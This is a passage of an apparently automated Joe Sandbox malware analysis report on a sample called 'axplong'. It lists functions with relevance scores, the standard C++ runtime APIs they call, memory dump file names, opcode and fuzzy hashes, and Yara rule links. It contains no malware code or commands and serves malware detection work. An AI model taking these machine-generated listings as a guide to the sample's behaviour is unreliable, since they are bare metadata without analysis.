                                                                                                                                                                                                                                                    • Instruction ID: 445b5de47e0d5b72c27a46a37cd3a59d80740bbaee3abc5c668d62932e1362c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d26aab92813eeeb3588c10b32599ab2f986453dad8efd287e2449a655284c76c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBA1E3B09013169FDB11EF64C84479AB7BAFF15324F44862DE819D7341EB35EA44CBA1
                                                                                                                                                                                                                                                    Function 00672670 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672806
                                                                                                                                                                                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 006728A0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy___std_exception_destroy
                                                                                                                                                                                                                                                    • String ID: 7oq<$P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2970364248-3549850343
                                                                                                                                                                                                                                                    • Opcode ID: 35efe021bd577aaa1591139417d8cde1fba429803cf50b0b6597957afb42b4f5
                                                                                                                                                                                                                                                    • Instruction ID: b08cd9e5159a84e415a2aa8330de358d5277170b077dda704a6a212dc53a64e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35efe021bd577aaa1591139417d8cde1fba429803cf50b0b6597957afb42b4f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80719371E002099FDB04DFA8C891BDDFBB6EF59310F54821DE805A7381D775A944CBA5
                                                                                                                                                                                                                                                    Function 00673A80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00673B53
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00673B59
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00673B62
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: 7oq<$pBg
                                                                                                                                                                                                                                                    • API String ID: 3308344742-1497611175
                                                                                                                                                                                                                                                    • Opcode ID: 1514b1e31c0a59d4c5fc266b42a420d700a8acb21123eeed8467a41d3940e1b4
                                                                                                                                                                                                                                                    • Instruction ID: 8ee25da6b2866180985afa4f20cf4308297d5244ef285c0897371a4da0b45f9e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1514b1e31c0a59d4c5fc266b42a420d700a8acb21123eeed8467a41d3940e1b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5051E471600B149FDB24DF28C885BAAB7E6FF14724F148A6DE45AC7791DB34AE00CB91
                                                                                                                                                                                                                                                    Function 0068C382 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                                                    • String ID: 7oq<$y/g
                                                                                                                                                                                                                                                    • API String ID: 2858396081-2260833730
                                                                                                                                                                                                                                                    • Opcode ID: ebf3eb0d0dc60d1cc85caa85d65f49882f72d06dac813a94bbc8dcd5bc155c1e
                                                                                                                                                                                                                                                    • Instruction ID: 420ade2c628efd1f985220c4c5b28b86b47eaaf2dc290bc56d90899a27fba3a7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ebf3eb0d0dc60d1cc85caa85d65f49882f72d06dac813a94bbc8dcd5bc155c1e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6516E30900116CFDF20EF24D5E59B977F2EF08320B25869AE805AB255DB30ED85CBB4
                                                                                                                                                                                                                                                    Function 006A70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
